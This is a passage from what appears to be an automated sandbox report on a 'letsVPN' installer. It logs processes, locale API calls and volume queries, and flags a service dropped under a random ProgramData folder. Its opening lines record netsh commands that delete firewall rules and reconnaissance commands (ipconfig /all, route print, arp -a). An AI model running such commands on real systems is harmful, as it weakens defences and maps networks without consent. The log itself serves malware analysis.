              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" checkNetFramework
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ipconfig /all
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C route print
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C arp -a
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE route print
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
              Source: letsvpn-latest.exe, 00000013.00000003.2329768871.0000000002830000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00385EA0 cpuid 17_2_00385EA0
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,_getptd,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,_getptd,EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,__crtDownlevelLCIDToLocaleName,__crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,_itow_s,0_2_0000000180023FF8
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,TestDefaultCountry,__crtGetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,__crtGetLocaleInfoEx,_invoke_watson,0_2_0000000180023040
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,WideCharToMultiByte,free,0_2_000000018001E840
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __getlocaleinfo,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,0_2_00000001800148B8
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_000000018001E9AC
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,EnumSystemLocalesW,0_2_00000001800239DC
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,0_2_0000000180022280
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,EnumSystemLocalesW,0_2_0000000180023A90
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _calloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,free,free,free,0_2_0000000180021B1C
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,TestDefaultLanguage,0_2_0000000180023B24
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP,0_2_00000001800234AC
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: EnumSystemLocalesW,0_2_000000018001650C
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,0_2_0000000180016550
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,TestDefaultLanguage,0_2_0000000180023D54
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtGetLocaleInfoEx,0_2_0000000180023560
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _calloc_crt,free,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,free,free,free,free,0_2_00000001800215B0
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,__crtGetUserDefaultLocaleName,_invoke_watson,_invoke_watson,_getptd,_getptd,LcidFromHexString,GetLocaleInfoW,0_2_0000000180023664
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0000000180023EA0
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,free,__crtGetLocaleInfoEx,_invoke_watson,0_2_000000018001674C
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,GetLocaleInfoW,0_2_0000000180023F50
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,GetLocaleInfoW,17_2_6C570F41
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: GetLocaleInfoW,_errno,_invalid_parameter_noinfo,_errno,_errno,_errno,_invalid_parameter_noinfo,17_2_6C56CADD
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,wcsncmp,17_2_6C57845E
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,_wcsicmp,_wcsnicmp,_TestDefaultCountry,wcslen,wcsncpy_s,_getptd,__crtGetLocaleInfoEx,_wcsicmp,__crtGetLocaleInfoEx,_wcsicmp,wcslen,wcsncpy_s,wcslen,_TestDefaultCountry,wcslen,_invoke_watson,__crtGetLocaleInfoEx,17_2_6C578579
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: __crtEnumSystemLocalesEx,EnumSystemLocalesW,17_2_6C578660
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: wcslen,wcslen,__crtEnumSystemLocalesEx,17_2_6C578683
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,IsValidCodePage,wcslen,wcsncpy_s,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,wcschr,wcschr,_itow_s,_GetLocaleNameFromLanguage,_GetLocaleNameFromLanguage,__crtGetLocaleInfoEx,_invoke_watson,17_2_6C578036
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: wcscmp,wcscmp,_wtol,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP,17_2_6C577FE9
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,_getptd,_LcidFromHexString,GetLocaleInfoW,_wcsicmp,_wcsicmp,_TestDefaultLanguage,17_2_6C5F9841
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: wcscmp,wcscmp,GetLocaleInfoW,_wtol,GetLocaleInfoW,GetACP,17_2_6C5F996B
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,WideCharToMultiByte,_freea_s,malloc,17_2_6C571A74
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,GetLocaleInfoW,_GetPrimaryLen,wcslen,17_2_6C5F9A2C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,memset,_getptd,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,_itow_s,17_2_6C5F9A96
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,free,_calloc_crt,strncpy_s,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,GetLastError,_calloc_crt,free,free,_invoke_watson,_malloc_crt,memcpy,_siglookup,17_2_6C571BFC
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,_getptd,_LcidFromHexString,GetLocaleInfoW,_wcsicmp,17_2_6C5F945C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,wcslen,wcslen,_GetPrimaryLen,EnumSystemLocalesW,17_2_6C5F954C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,wcslen,EnumSystemLocalesW,17_2_6C5F950C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,wcslen,_GetPrimaryLen,EnumSystemLocalesW,17_2_6C5F95C9
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,_getptd,_LcidFromHexString,GetLocaleInfoW,_wcsicmp,GetLocaleInfoW,_wcsicmp,_wcsnicmp,wcslen,GetLocaleInfoW,_wcsicmp,wcslen,_wcsicmp,_TestDefaultLanguage,17_2_6C5F964C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,wcsncpy_s,wcslen,wcscmp,wcscmp,memcpy,wcscpy_s,wcscpy_s,wcslen,wcsncpy_s,wcsncpy_s,___get_qualified_locale_downlevel,__crtIsValidLocaleName,__crtGetLocaleInfoEx,GetACP,wcsncpy_s,wcsncpy_s,wcsncpy_s,wcslen,wcsncpy_s,_invoke_watson,_errno,17_2_6C56314B
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: wcslen,__crtEnumSystemLocalesEx,17_2_6C5F935F
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,__crtGetLocaleInfoEx,_wcsicmp,wcslen,wcsncpy_s,_invoke_watson,_getptd,_getptd,_LcidFromHexString,GetLocaleInfoW,17_2_6C5F93A9
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: EnumSystemLocalesW,53_2_00868096
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: EnumSystemLocalesW,53_2_008680E1
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,53_2_0086219D
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: EnumSystemLocalesW,53_2_0086817C
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,53_2_00868207
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: EnumSystemLocalesW,53_2_00861CFD
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,53_2_0086845C
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,53_2_00868584
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,53_2_00867DF0
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,53_2_0086868C
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,53_2_0086875F
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A20D8 ??2@YAPEAX_K@Z,GetLastError,??3@YAXPEAX@Z,??2@YAPEAX_K@Z,SetupDiGetDeviceRegistryPropertyW,??3@YAXPEAX@Z,28_2_00007FF7132A20D8
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\ProgramData\letsvpn-latest.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeQueries volume information: C:\Program Files (x86)\letsvpn\driver\tap0901.cat VolumeInformation
              Source: C:\Windows\System32\drvinst.exeQueries volume information: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\tap0901.cat VolumeInformation
              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\CommunityToolkit.Mvvm.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.InteropServices.RuntimeInformation.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Memory.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.Unsafe.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Buffers.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNInfraStructure.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Analytics.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Crashes.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.batteries_v2.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.core.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.provider.dynamic_cdecl.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.nativelibrary.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Hardcodet.Wpf.TaskbarNotification.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\PusherClient.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\WebSocket4Net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SuperSocket.ClientEngine.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Http.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
